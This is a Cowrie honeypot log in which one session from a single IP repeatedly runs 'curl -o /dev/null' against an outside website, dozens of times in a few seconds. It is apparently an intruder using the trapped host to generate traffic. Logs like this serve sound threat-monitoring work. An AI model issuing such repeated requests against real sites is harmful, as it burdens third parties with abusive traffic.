{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.896460Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.938051Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.939154Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:18.979476Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:18.980534Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.019980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.021068Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.059753Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.060777Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.106473Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.107740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.149810Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.150997Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.193539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.194937Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.232780Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.233903Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.285716Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.286893Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.325014Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.326253Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.367541Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.368714Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.406913Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.408012Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.445967Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.447041Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.487573Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.488705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.528833Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.529904Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.578922Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.580271Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.617256Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.618494Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.657446Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.658724Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.700078Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.701250Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.740986Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.742238Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.786235Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.787713Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.824667Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.825844Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.913932Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.915084Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.954111Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.955521Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:19.994281Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:19.995367Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.034120Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.035116Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.076125Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.077330Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.116623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.117795Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.155249Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.156423Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.195690Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.196863Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.237351Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.238636Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.277061Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.278539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.319031Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.320158Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.359029Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.360170Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.398838Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.399969Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.438727Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.439851Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.477474Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.478634Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.515499Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.516726Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.555268Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.556391Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.594310Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.595421Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.632976Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.634079Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.672851Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.674127Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.711901Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.713307Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.750511Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.751493Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.789793Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.790910Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.829708Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.831177Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.868534Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.869673Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.906425Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.907810Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.946601Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.947763Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:20.984547Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:20.985437Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.025117Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.025874Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.063735Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.065192Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.102401Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.103702Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.141099Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.142269Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.179979Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.181123Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.220173Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.221165Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.258842Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.260042Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.298611Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.299721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.338321Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.339111Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.376195Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.377521Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.414176Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.415175Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.452361Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.453377Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.490927Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.492047Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.529705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.530655Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
